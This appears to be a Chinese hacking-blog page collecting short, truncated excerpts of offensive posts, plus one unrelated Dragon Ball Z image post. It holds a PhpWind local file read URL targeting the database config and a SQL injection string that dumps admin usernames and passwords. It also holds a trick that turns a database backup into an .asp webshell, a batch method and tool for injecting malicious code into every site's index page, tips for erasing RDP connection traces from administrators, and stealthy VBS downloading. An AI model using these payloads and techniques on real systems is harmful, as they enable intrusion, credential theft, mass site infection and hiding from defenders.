PhpWind 防盗链插件Showpic.php本地读文件漏洞

信息来源:H4x0r's Blog

漏洞文件:
showpic.php

str=$_SERVER['QUERY_STRING'];
$img=base64_decode($str);
$codelen=strlen($safeguard);//获取附加码长度
$img=substr($img,$codelen); //去掉附加码
readfile($img);

提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容

漏洞利用方式:

http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==

然后查看源文件。

这里的ZGF0YS9zcWxfY29uZmlnLnBocA== 阅读全文 »

Tags: ,

两个批量挂马脚本

来源:Sprite's BLOG

scan.vbe
cscript scan.vbe web目录
程序代码:
阅读全文 »

Tags:

3389登陆记录的清除

来源:慕容小语's Blog

很多时候,因为内网信任或者vlan等我们在外面连不上目标的3389终端,又不可能每次都靠反弹后门来htran

一般来说,可以在内网信任的任何一台机器(比如web)上来直接mstsc来连接内网ip

默认是空记录,或者是仅有几个被连接过的ip记录,当我们连接完内网新的ip的时候,连接记录会默认显示出来,很苦恼啊。有经验的管理员基本上都可以发现

清理很简单

HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
把右边显示出来的,非原有的ip键值直接DEL就可以啦~~但是千万记住默认注册表打开的时候,当前键值是在哪儿(一般是主键,没有分树),照着默认一打开时候的树状模样恢复就ok

还是那句话,我们主要是针对有经验的管理员^-^

Tags: ,

沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用

来源:C.Rufus Security Team
by cooldiyer

+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2

后台“图文管理”里添加文章,上传一个flash文件
点附加管理里的备份压缩
数据库地址为只读
打开恢复数据库窗口。IE输入
javascript:alert(window.frames[‘list’].document.forms[0].backpath.value=”/data/x.asp”);
阅读全文 »

Tags: , ,

使用vbs下载文件

鬼仔注:一个新的方法,但是缺点是代码有点长了,echo的时候不方便。文中第一段代码可能会被杀毒软件误报,为了避免误会,传到了单独的txt中。

来源:lake2的专栏
说到使用vbs下载文件是不是想到了XMLHTTP呢,呵呵,以下是比较经典的代码:
article_1073_codes.txt
当你把这段代码保存为vbs的时候,杀毒软件可能就开始报警了;而且使用中cscript.exe会访问网络,不太隐蔽。
那么,有没有更好的方法呢?答案很明显:-)
我们可以利用一个叫InternetExplorer.Applica 阅读全文 »

Tags:

解决Win服务器终端连接用户过多的方法

鬼仔注:XP sp3下,取消了/console参数,换成了/admin,mstsc.exe 6.0.6001

/console 连接到服务器的控制台会话

来源:cnfjhh’s blog

不必用logoff id 去T管理了
用下面这个就ok:
运行里输入
mstsc /console /v:IP:终端端口

Tags:

Dragon Ball Z Characters(龙珠Z人物全集)

小学时最喜欢的两部漫画:《七龙珠》、《机器猫》。以前发过关于《机器猫》的一些东西: 12 。今天在杰西熊的部落格那里看到这套关于龙珠的图片,不过好像是龙珠Z,我没看过《龙珠Z》,不知道和《七龙珠》有什么区别,我记得还有《龙珠GT》,不过也没看过。
这套图包括全人物图和单幅的人物图,很喜欢。不过杰西熊那里的链接有些错误,一共是六套,我修正了一下,这里放出来预览的是几张全人物的合图,是经过锐化的,这几张全人物原图的下载地址:
阅读全文 »

Tags:

批量挂马器

鬼仔注:丰子写的。
不过还有一种方法:
比如说d:\web\下面有N个站点,然后 dir /b /s d:\web\index.asp >1.txt
等下打开生成的1.txt
看到 d:\web\1\index.asp
d:\web\2\index.asp
d:\web\3\index.asp
这样的
然后将“d:\web\”全部替换为“echo 挂马的代码 >>d:\web\”
保存为BAT
在WEBSHELL上执行

下面看丰子写的这个吧,使用比较简单:

来源:丰初's Blog
C:\>MMbluestar.exe
MMBluestar Ver1.1 李丰初出品 2007年五月5号于公司
当前根目录是>>>C:\
使用方法MMBluestar.exe 路径 挂M的地址
阅读全文 »

Tags: